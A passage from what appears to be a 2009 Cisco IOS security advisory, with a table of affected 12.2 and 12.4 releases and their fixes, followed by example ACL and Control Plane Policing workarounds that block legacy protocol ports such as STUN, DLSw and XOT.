|            | 12.2SG                      |                        |
|------------+-----------------------------+------------------------|
| 12.2EWA    | Vulnerable; first fixed in  | 12.2(31)SGA9           |
|            | 12.2SG                      |                        |
|------------+-----------------------------+------------------------|
|            | Releases prior to 12.2(44)  |                        |
|            | EX are vulnerable, release  |                        |
| 12.2EX     | 12.2(44)EX and later are    | 12.2(44)SE6            |
|            | not vulnerable; first fixed |                        |
|            | in 12.2SE                   |                        |
|------------+-----------------------------+------------------------|
| 12.2EY     | 12.2(44)EY                  | 12.2(44)SE6            |
|------------+-----------------------------+------------------------|
| 12.2EZ     | Vulnerable; first fixed in  | 12.2(44)SE6            |
|            | 12.2SE                      |                        |
|------------+-----------------------------+------------------------|
| 12.2FX     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2FY     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2FZ     | Vulnerable; first fixed in  | 12.2(44)SE6            |
|            | 12.2SE                      |                        |
|------------+-----------------------------+------------------------|
|            | Vulnerable; first fixed in  | 12.2(33)SRC4;          |
| 12.2IRA    | 12.2SRC                     | Available on           |
|            |                             | 18-MAY-2009            |
|------------+-----------------------------+------------------------|
|            | Vulnerable; first fixed in  | 12.2(33)SRC4;          |
| 12.2IRB    | 12.2SRC                     | Available on           |
|            |                             | 18-MAY-2009            |
|------------+-----------------------------+------------------------|
| 12.2IXA    | Vulnerable; migrate to any  | 12.2(18)IXH; Available |
|            | release in 12.2IXH          | on 31-MAR-2009         |
|------------+-----------------------------+------------------------|
| 12.2IXB    | Vulnerable; migrate to any  | 12.2(18)IXH; Available |
|            | release in 12.2IXH          | on 31-MAR-2009         |
|------------+-----------------------------+------------------------|
| 12.2IXC    | Vulnerable; migrate to any  | 12.2(18)IXH; Available |
|            | release in 12.2IXH          | on 31-MAR-2009         |
|------------+-----------------------------+------------------------|
| 12.2IXD    | Vulnerable; migrate to any  | 12.2(18)IXH; Available |
|            | release in 12.2IXH          | on 31-MAR-2009         |
|------------+-----------------------------+------------------------|
| 12.2IXE    | Vulnerable; migrate to any  | 12.2(18)IXH; Available |
|            | release in 12.2IXH          | on 31-MAR-2009         |
|------------+-----------------------------+------------------------|
| 12.2IXF    | Vulnerable; migrate to any  | 12.2(18)IXH; Available |
|            | release in 12.2IXH          | on 31-MAR-2009         |
|------------+-----------------------------+------------------------|
| 12.2IXG    | Vulnerable; migrate to any  | 12.2(18)IXH; Available |
|            | release in 12.2IXH          | on 31-MAR-2009         |
|------------+-----------------------------+------------------------|
| 12.2JA     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2JK     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2MB     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2MC     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2S      | Vulnerable; first fixed in  | 12.2(33)SB4            |
|            | 12.2SB                      |                        |
|------------+-----------------------------+------------------------|
|            | 12.2(33)SB3                 |                        |
|            |                             |                        |
| 12.2SB     | 12.2(28)SB13                | 12.2(33)SB4            |
|            |                             |                        |
|            | 12.2(31)SB14                |                        |
|------------+-----------------------------+------------------------|
| 12.2SBC    | Vulnerable; first fixed in  | 12.2(33)SB4            |
|            | 12.2SB                      |                        |
|------------+-----------------------------+------------------------|
| 12.2SCA    | Vulnerable; first fixed in  | 12.2(33)SCB1           |
|            | 12.2SCB                     |                        |
|------------+-----------------------------+------------------------|
| 12.2SCB    | 12.2(33)SCB1                | 12.2(33)SCB1           |
|------------+-----------------------------+------------------------|
|            | 12.2(46)SE2                 |                        |
|            |                             |                        |
| 12.2SE     | 12.2(50)SE                  | 12.2(44)SE6            |
|            |                             |                        |
|            | 12.2(44)SE5                 |                        |
|------------+-----------------------------+------------------------|
| 12.2SEA    | Vulnerable; first fixed in  | 12.2(44)SE6            |
|            | 12.2SE                      |                        |
|------------+-----------------------------+------------------------|
| 12.2SEB    | Vulnerable; first fixed in  | 12.2(44)SE6            |
|            | 12.2SE                      |                        |
|------------+-----------------------------+------------------------|
| 12.2SEC    | Vulnerable; first fixed in  | 12.2(44)SE6            |
|            | 12.2SE                      |                        |
|------------+-----------------------------+------------------------|
| 12.2SED    | Vulnerable; first fixed in  | 12.2(44)SE6            |
|            | 12.2SE                      |                        |
|------------+-----------------------------+------------------------|
| 12.2SEE    | Vulnerable; first fixed in  | 12.2(44)SE6            |
|            | 12.2SE                      |                        |
|------------+-----------------------------+------------------------|
| 12.2SEF    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
|            | Releases prior to 12.2(25)  |                        |
|            | SEG4 are vulnerable,        |                        |
| 12.2SEG    | release 12.2(25)SEG4 and    | 12.2(44)SE6            |
|            | later are not vulnerable;   |                        |
|            | first fixed in 12.2SE       |                        |
|------------+-----------------------------+------------------------|
| 12.2SG     | 12.2(50)SG                  | 12.2(52)SG; Available  |
|            |                             | on 15-MAY-2009         |
|------------+-----------------------------+------------------------|
| 12.2SGA    | 12.2(31)SGA9                | 12.2(31)SGA9           |
|------------+-----------------------------+------------------------|
| 12.2SL     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2SM     | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SO     | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SQ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
|            | Vulnerable; first fixed in  | 12.2(33)SRC4;          |
| 12.2SRA    | 12.2SRC                     | Available on           |
|            |                             | 18-MAY-2009            |
|------------+-----------------------------+------------------------|
|            |                             | 12.2(33)SRB5a;         |
|            |                             | Available on           |
| 12.2SRB    | Vulnerable; first fixed in  | 3-April-2009 12.2(33)  |
|            | 12.2SRC                     | SRC4; Available on     |
|            |                             | 18-MAY-2009 12.2(33)   |
|            |                             | SRD1                   |
|------------+-----------------------------+------------------------|
|            |                             | 12.2(33)SRC4;          |
| 12.2SRC    | 12.2(33)SRC3                | Available on           |
|            |                             | 18-MAY-2009 12.2(33)   |
|            |                             | SRD1                   |
|------------+-----------------------------+------------------------|
| 12.2SRD    | 12.2(33)SRD1                | 12.2(33)SRD1           |
|------------+-----------------------------+------------------------|
| 12.2STE    | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SU     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2SV     | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SVA    | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SVC    | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SVD    | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SVE    | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2SW     | Vulnerable; migrate to any  |                        |
|            | release in 12.4SW           |                        |
|------------+-----------------------------+------------------------|
| 12.2SX     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2SXA    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2SXB    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2SXD    | Vulnerable; first fixed in  | 12.2(18)SXF16          |
|            | 12.2SXF                     |                        |
|------------+-----------------------------+------------------------|
| 12.2SXE    | Vulnerable; first fixed in  | 12.2(18)SXF16          |
|            | 12.2SXF                     |                        |
|------------+-----------------------------+------------------------|
| 12.2SXF    | 12.2(18)SXF16               | 12.2(18)SXF16          |
|------------+-----------------------------+------------------------|
|            | 12.2(33)SXH5; Available on  | 12.2(33)SXH5;          |
| 12.2SXH    | 20-APR-2009                 | Available on           |
|            |                             | 20-APR-2009            |
|------------+-----------------------------+------------------------|
| 12.2SXI    | 12.2(33)SXI1                | 12.2(33)SXI1           |
|------------+-----------------------------+------------------------|
| 12.2SY     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2SZ     | Vulnerable; first fixed in  | 12.2(33)SB4            |
|            | 12.2SB                      |                        |
|------------+-----------------------------+------------------------|
| 12.2T      | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2TPC    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XA     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XB     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XC     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XD     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XE     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XF     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XG     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XH     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XI     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XJ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XK     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XL     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XM     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
|            | Vulnerable; first fixed in  | 12.2(33)SB4            |
| 12.2XN     | 12.2SRC                     |                        |
|            |                             | 12.2(33)SRD1           |
|------------+-----------------------------+------------------------|
| 12.2XNA    | Vulnerable; first fixed in  | 12.2(33)SRD1           |
|            | 12.2SRD                     |                        |
|------------+-----------------------------+------------------------|
| 12.2XNB    | 12.2(33)XNB1                | 12.2(33)XNB3           |
|------------+-----------------------------+------------------------|
| 12.2XNC    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XO     | 12.2(46)XO                  | 12.2(46)XO             |
|------------+-----------------------------+------------------------|
| 12.2XQ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XR     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XS     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XT     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XU     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XV     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2XW     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YA     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YB     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YC     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YD     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YE     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YF     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YG     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YH     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YJ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YK     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YL     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YM     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YN     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YO     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YP     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YQ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YR     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YS     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YT     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YU     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YV     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YW     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YX     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YY     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2YZ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZA     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZB     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZC     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZD     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZE     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZF     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZG     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZH     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZJ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZL     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2ZP     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
|            | Vulnerable; first fixed in  | 12.2(33)SXH5;          |
| 12.2ZU     | 12.2SXH                     | Available on           |
|            |                             | 20-APR-2009            |
|------------+-----------------------------+------------------------|
| 12.2ZX     | Vulnerable; first fixed in  | 12.2(33)SB4            |
|            | 12.2SB                      |                        |
|------------+-----------------------------+------------------------|
| 12.2ZY     | Vulnerable; contact TAC     |                        |
|------------+-----------------------------+------------------------|
| 12.2ZYA    | 12.2(18)ZYA1                | 12.2(18)ZYA1           |
|------------+-----------------------------+------------------------|
| Affected   |                             |                        |
| 12.3-Based | First Fixed Release         | Recommended Release    |
| Releases   |                             |                        |
|-------------------------------------------------------------------|
| There are no affected 12.3 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                             |                        |
| 12.4-Based | First Fixed Release         | Recommended Release    |
| Releases   |                             |                        |
|------------+-----------------------------+------------------------|
| 12.4       | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4JA     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4JDA    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4JK     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4JL     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4JMA    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4JMB    | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4JX     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
|            | 12.4(15)MD2                 |                        |
|            |                             |                        |
| 12.4MD     | Releases prior to 12.4(11)  | 12.4(11)MD7            |
|            | MD6 are not vulnerable,     |                        |
|            | releases 12.4(15)MD and     |                        |
|            | later are vulnerable.       |                        |
|------------+-----------------------------+------------------------|
|            | 12.4(19)MR1                 |                        |
|            |                             |                        |
| 12.4MR     | Releases prior to 12.4(16)  | 12.4(19)MR2            |
|            | MR2 are not vulnerable,     |                        |
|            | releases 12.4(19)MR and     |                        |
|            | later are vulnerable        |                        |
|------------+-----------------------------+------------------------|
| 12.4SW     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
|            | 12.4(22)T                   |                        |
|            |                             | 12.4(22)T1             |
| 12.4T      | 12.4(20)T2                  |                        |
|            |                             | 12.4(15)T9; Available  |
|            | Releases prior to 12.4(20)T | on 29-APR-2009         |
|            | are NOT vulnerable          |                        |
|------------+-----------------------------+------------------------|
| 12.4XA     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XB     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XC     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XD     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XE     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XF     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XG     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XJ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XK     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XL     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XM     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XN     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XP     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XQ     | 12.4(15)XQ2                 | 12.4(15)XQ2            |
|------------+-----------------------------+------------------------|
|            |                             | 12.4(22)T1             |
| 12.4XR     | 12.4(15)XR4                 |                        |
|            |                             | 12.4(15)T9; Available  |
|            |                             | on 29-APR-2009         |
|------------+-----------------------------+------------------------|
| 12.4XT     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XV     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4XW     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
|            |                             | 12.4(22)T1             |
| 12.4XY     | 12.4(15)XY4                 |                        |
|            |                             | 12.4(15)T9; Available  |
|            |                             | on 29-APR-2009         |
|------------+-----------------------------+------------------------|
| 12.4XZ     | 12.4(15)XZ2                 | 12.4(15)XZ2            |
|------------+-----------------------------+------------------------|
| 12.4YA     | 12.4(20)YA2                 | 12.4(20)YA3            |
|------------+-----------------------------+------------------------|
| 12.4YB     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.4YD     | Not Vulnerable              |                        |
+-------------------------------------------------------------------+

Workarounds
==========
The following mitigations have been identified for this
vulnerability, which may help protect an infrastructure until an
upgrade to a fixed version of Cisco IOS software can be scheduled:

Infrastructure Access Control Lists
+----------------------------------

Although it is often difficult to block traffic that transits a
network, it is possible to identify traffic that should never be
allowed to target infrastructure devices and block that traffic at
the border of networks. Infrastructure Access Control Lists (iACLs)
are a network security best practice and should be considered as a
long-term addition to good network security as well as a workaround
for these specific vulnerabilities. The iACL example below should be
included as part of the deployed infrastructure access-list which
will protect all devices with IP addresses in the infrastructure IP
address range:


    !---
    !--- Only sections pertaining to features enabled on the device
    !--- need be configured.
    !---
    !--- Feature: ALPS
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
        INFRASTRUCTURE_ADDRESSES WILDCARD eq 350
    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
        INFRASTRUCTURE_ADDRESSES WILDCARD eq 10000

    !---
    !--- Deny ALPS TCP traffic from all other sources destined
    !--- to infrastructure addresses.
    !---

    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 350
    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 10000

    !---
    !--- Feature: STUN
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1994
    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD range 1990 1992

    !---
    !--- Deny STUN TCP traffic from all other sources destined
    !--- to infrastructure addresses.
    !---

    access-list 150 deny tcp any
        INFRASTRUCTURE_ADDRESSES WILDCARD eq 1994
    access-list 150 deny tcp any
        INFRASTRUCTURE_ADDRESSES WILDCARD range 1990 1992

    !---
    !--- Feature: BSTUN
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1963
    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD range 1976 1979

    !---
    !--- Deny BSTUN TCP traffic from all other sources destined
    !--- to infrastructure addresses.
    !---

    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1963
    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD range 1976 1979

    !---
    !--- Feature: NCIA
    !---

    !---
    !--- Leverage the underlying protocols, DLSw, RSRB, etc.
    !---

    !---
    !--- Feature: DLSW
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 2065
    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 2067
    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD range 1981 1983

    !---
    !--- Deny DLSW TCP traffic from all other sources destined
    !--- to infrastructure addresses.
    !---

    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 2065
    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 2067
    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD range 1981 1983

    !---
    !--- Feature: RSRB
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD range 1987 1989
    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1996

    !---
    !--- Deny RSRB TCP traffic from all other sources destined
    !--- to infrastructure addresses.
    !---

    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD range 1987 1989
    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1996

    !---
    !--- Feature: PPTP
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1723

    !---
    !--- Deny PPTP TCP traffic from all other sources destined
    !--- to infrastructure addresses.
    !---

    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1723

    !---
    !--- Feature: RBP
    !---
    !--- RBP will listen for TCP connections on the configured port
    !--- as per "local port <port_number>". The following example
    !--- uses port 1055
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1055

    !---
    !--- Deny RBP traffic from all other sources destined
    !--- to infrastructure addresses.
    !---

    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1055

    !---
    !--- Feature: XOT and X.25 Routing
    !---

    access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1998

    !---
    !--- Deny XOT and X25 TCP traffic from all other sources 
    !--- destined to infrastructure addresses.
    !---

    access-list 150 deny tcp any
         INFRASTRUCTURE_ADDRESSES WILDCARD eq 1998

    !---
    !--- Permit/deny all other Layer 3 and Layer 4 traffic in
    !--- accordance with existing security policies and
    !--- configurations. Permit all other traffic to transit the
    !--- device.
    !---

    access-list 150 permit ip any any

    !---
    !--- Apply access-list to all interfaces (only one example
    !--- shown)
    !---

    interface serial 2/0
     ip access-group 150 in

The white paper entitled "Protecting Your Core: Infrastructure
Protection Access Control Lists" presents guidelines and recommended
deployment techniques for infrastructure protection access lists.
This white paper can be obtained at the following link: 
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a1a55.shtml

Receive ACLs (rACL)
+------------------

For distributed platforms, Receive ACLs may be an option starting in
Cisco IOS Software Versions 12.0(21)S2 for the 12000 (GSR), 12.0(24)S
for the 7500, and 12.0(31)S for the 10720. The Receive ACL protects
the device from harmful traffic before the traffic can impact the
route processor. Receive ACLs are designed to protect only the device
on which they are configured. On the 12000, 7500, and 10720, transit
traffic is never affected by a receive ACL. Because of this, the
destination IP address "any" used in the example ACL entries below
refers only to the router's own physical or virtual IP addresses.
Receive ACLs are considered a network security best practice, and
should be considered as a long-term addition to good network
security, as well as a workaround for this specific vulnerability.
The white paper entitled "Protecting Your Core: Infrastructure
Protection Access Control Lists" presents guidelines and recommended
deployment techniques for infrastructure protection access lists.
This white paper can be obtained at the following link 
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a0a5e.shtml

The following is the receive path ACL written to permit this type of
traffic from trusted hosts:


    !---
    !--- Only sections pertaining to features enabled on the device
    !--- need be configured.
    !---

    !---
    !--- Permit ALPS traffic from trusted hosts allowed to the RP.
    !--- 

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 350
    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
        any eq 10000

    !---
    !--- Deny ALPS traffic from all other sources to the RP.
    !--- 

    access-list 150 deny tcp any any eq 350
    access-list 150 deny tcp any any eq 10000

    !---
    !--- Permit STUN traffic from trusted hosts allowed to the RP.
    !--- 

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 1994
    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any range 1990 1992

    !---
    !--- Deny STUN traffic from all other sources to the RP.
    !--- 

    access-list 150 deny tcp any any eq 1994
    access-list 150 deny tcp any any range 1990 1992

    !---
    !--- Permit BSTUN traffic from trusted hosts allowed to the RP.
    !--- 

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 1963
    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any range 1976 1979

    !---
    !--- Deny BSTUN traffic from all other sources to the RP.
    !--- 

    access-list 150 deny tcp any any eq 1963
    access-list 150 deny tcp any any range 1976 1979

    !---
    !--- Permit DLSw from trusted hosts allowed to the RP.
    !--- 

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 2065
    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 2067
    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any range 1981 1983

    !---
    !--- Deny DLSw all other sources to the RP.
    !--- 

    access-list 150 deny tcp any any eq 2065
    access-list 150 deny tcp any any eq 2067
    access-list 150 deny tcp any any range 1981 1983

    !---
    !--- Permit RSRB traffic from trusted hosts allowed to the RP.
    !---

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 1996
    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any range 1987 1989

    !---
    !--- Deny RSRB traffic from all other sources to the RP.
    !---

    access-list 150 deny tcp any any eq 1996
    access-list 150 deny tcp any any range 1987 1989

    !--- 
    !--- Permit PPTP traffic from trusted hosts allowed to the RP.
    !--- 

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 1723

    !---
    !--- Deny PPTP traffic from all other sources to the RP.
    !--- 

    access-list 150 deny tcp any any eq 1723

    !---
    !--- Permit RBP traffic from trusted hosts allowed to the RP.
    !--- RBP will listen for TCP connections on the configured port
    !--- as per "local port <port_number>".  The following example
    !--- uses port 1055
    !---

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 1055

    !---
    !--- Deny RBP traffic from all other sources to the RP.
    !---

    access-list 150 deny tcp any any eq 1055

    !---
    !--- Permit XOT and X.25 Routing traffic from trusted hosts allowed 
    !--- to the RP.
    !---

    access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
         any eq 1998

    !---
    !--- Deny XOT and X.25 Routing traffic from all other sources to 
    !---  the RP.
    !---

    access-list 150 deny tcp any any eq 1998

    !--- Permit all other traffic to the RP
    !--- according to security policy and configurations.

    access-list 150 permit ip any any

    !--- Apply this access list to the 'receive' path.

    ip receive access-list 150

Control Plane Policing
+---------------------

Control Plane Policing (CoPP) can be used to block TCP traffic for the
affected features from reaching the device. Cisco IOS software
releases 12.0S, 12.2SX, 12.2S, 12.3T, 12.4, and 12.4T support the
CoPP feature. CoPP can be configured on a device to protect the
management and control planes and minimize the risk and effectiveness
of direct infrastructure attacks by explicitly permitting only
authorized traffic that is sent to infrastructure devices in
accordance with existing security policies and configurations. The
CoPP example below should be included as part of the deployed CoPP
that will protect all devices with IP addresses in the infrastructure
IP address range.


    !---
    !--- Only sections pertaining to features enabled on the device
    !--- need be configured.
    !---
    !--- Feature: ALPS
    !---

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD any eq 350
    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD any eq 10000

    !---
    !--- Permit ALPS traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any eq 350
    access-list 150 permit tcp any any eq 10000

    !---
    !--- Feature: STUN
    !---

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 1994
    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any range 1990 1992

    !---
    !--- Permit STUN traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so 
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any eq 1994
    access-list 150 permit tcp any any range 1990 1992

    !---
    !--- Feature: BSTUN
    !---

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 1963
    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any range 1976 1979

    !---
    !--- Permit BSTUN traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any eq 1963
    access-list 150 permit tcp any any range 1976 1979

    !---
    !--- Feature: NCIA
    !---
